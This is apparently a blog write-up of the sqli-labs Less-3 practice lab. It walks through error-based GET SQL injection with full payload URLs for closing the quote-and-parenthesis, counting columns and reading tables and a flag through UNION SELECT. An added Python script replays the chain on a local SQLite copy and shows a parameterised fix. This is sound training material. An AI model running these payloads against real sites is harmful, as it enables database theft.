Less-3

Less-3 GET - Error based - Single quotes with twist string (error-based GET injection, string parameter with a single-quote-plus-parenthesis twist)

1. Check whether the parameter is injectable

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1'

Database error echoed back => injectable (and the error text is shown, which is what "error based" means here)

2. Determine the parameter type

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1 and 1=2

Normal page => string type. If id were used as a bare number, `1 and 1=2` would be evaluated and the row would disappear; because the whole value sits inside quotes, MySQL casts the string `'1 and 1=2'` to 1 and returns the row as usual.

3. Find the closing sequence

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=2 --+

Error

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1' and 1=1 --+

Still an error => the single quote does close the string, but even the always-true condition breaks the query, so something after the quote (an opening parenthesis) is still unmatched. The `--+` comments out whatever the application appends after our input; without it every probe in this step would error regardless of the closure and tell us nothing.

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') and 1=1 --+

Normal page => `')` closes the original expression (as a cross-check, `1') and 1=2 --+` should give an empty page rather than an error)

4. Find how many columns the queried table has

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') order by 3 --+

Normal page

https://636-883a1f80-f530-4890-bcbe-240bbf69199c.do-not-trust.hacking.run/?id=1') order by 4 --+

Error ("Unknown column '4' in 'order clause'") => 3 columns. The closure must be the full `')` here as well; `1) order by 4` would just be compared as a string and would not test anything.

5. Run a UNION SELECT to find which columns are displayed

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,3 --+

2 and 3 are printed on the page => columns 2 and 3 are the display positions. The `-1` makes the original WHERE match nothing, so the only row left to display is the one from our UNION.

6. Read the current database name and the server version

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,database(),version() --+

7. List the tables in the current database

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

8. List the columns of table jCKIHUzE

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="jCKIHUzE" --+

9. Read the flag column of that table

https://636-1d27078c-3250-425c-a29c-3dc29390526a.do-not-trust.hacking.run/?id=-1') union select 1,2,group_concat(flag) from jCKIHUzE --+
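The chain above (steps 3 to 9) re-enacted offline, as an added example that is not part of the original post. It assumes the Less-3 server builds its query as `SELECT * FROM users WHERE id=('$id') LIMIT 0,1` (the sqli-labs source; the writeup never shows it), runs it against an in-memory SQLite database with constructed sample rows, and swaps MySQL's `information_schema`/`database()` for SQLite's `sqlite_master`. SQLite does not copy MySQL's lax cast of `'1 and 1=2'` to 1, so the step-2 probe is not reproduced; every other probe behaves as the writeup describes. A parameterised lookup is included beside the vulnerable one to show what the same payloads do once the input is bound instead of pasted.

```python
"""Offline re-enactment of the Less-3 probes against an in-memory SQLite copy."""
import sqlite3

# Assumption: sqli-labs Less-3 builds its query as
#   SELECT * FROM users WHERE id=('$id') LIMIT 0,1
# (taken from the sqli-labs source; the writeup above never shows it).
VULN_TEMPLATE = "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1"


def make_db():
    """Constructed sample data: a 3-column users table and the flag table named in the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
        CREATE TABLE jCKIHUzE(flag TEXT);
        INSERT INTO jCKIHUzE VALUES ('flag{constructed-sample-flag}');
    """)
    return conn


def vulnerable_lookup(conn, user_id):
    """The Less-3 pattern: the parameter is pasted straight into the SQL text.

    Returns ('ok', row) for a hit, ('empty', None) for no hit and ('error', message)
    when the database rejects the statement. Less-3 prints that message on the page,
    which is what makes the lab 'error based'.
    """
    sql = VULN_TEMPLATE.format(id=user_id)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", row) if row is not None else ("empty", None)


def safe_lookup(conn, user_id):
    """Parameterised version: the whole string is bound as a single value."""
    row = conn.execute("SELECT * FROM users WHERE id=(?) LIMIT 0,1", (user_id,)).fetchone()
    return ("ok", row) if row is not None else ("empty", None)


def find_closure(conn, candidates=("'", "')", '")', '"')):
    """Step 3: the first prefix for which a true condition restores the normal row and a
    false one gives an empty page. The trailing '-- ' (what '--+' decodes to) discards
    the ') LIMIT 0,1' that the template appends after our input."""
    for close in candidates:
        true_probe = vulnerable_lookup(conn, f"1{close} and 1=1 -- ")
        false_probe = vulnerable_lookup(conn, f"1{close} and 1=2 -- ")
        if true_probe[0] == "ok" and false_probe[0] == "empty":
            return close
    return None


def count_columns(conn, close, max_cols=10):
    """Step 4: ORDER BY n succeeds up to the real column count and errors one past it."""
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(conn, f"1{close} order by {n} -- ")[0] == "error":
            return n - 1
    return max_cols


def union_read(conn, close, expr):
    """Steps 5-9: id=-1 empties the real result, so the UNION row is the only one shown;
    'expr' is whatever goes into display position 3 (and may carry its own FROM clause)."""
    status, row = vulnerable_lookup(conn, f"-1{close} union select 1,2,{expr} -- ")
    return row[2] if status == "ok" else None


def main():
    conn = make_db()
    print("id=1'          ->", vulnerable_lookup(conn, "1'")[0])      # error: injectable
    close = find_closure(conn)
    print("closure        ->", close)                                   # ')
    print("columns        ->", count_columns(conn, close))              # 3
    # SQLite stand-ins for information_schema.tables / database() / version()
    print("tables         ->", union_read(conn, close,
          "group_concat(name) from sqlite_master where type='table'"))
    print("flag           ->", union_read(conn, close, "group_concat(flag) from jCKIHUzE"))
    print("safe, same payload ->", safe_lookup(conn, f"1{close} and 1=1 -- "))  # empty


if __name__ == "__main__":
    main()
```

The `find_closure` candidates are ordered from the simplest closure up; a bare `'` is tried first and fails exactly as in step 3 above (the true-condition probe still errors), so the function lands on `')`. Against the parameterised `safe_lookup` the same `1') and 1=1 -- ` string is just a value that matches no id and returns nothing.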

posted @ 2022-03-20 08:32  WeQi_Blog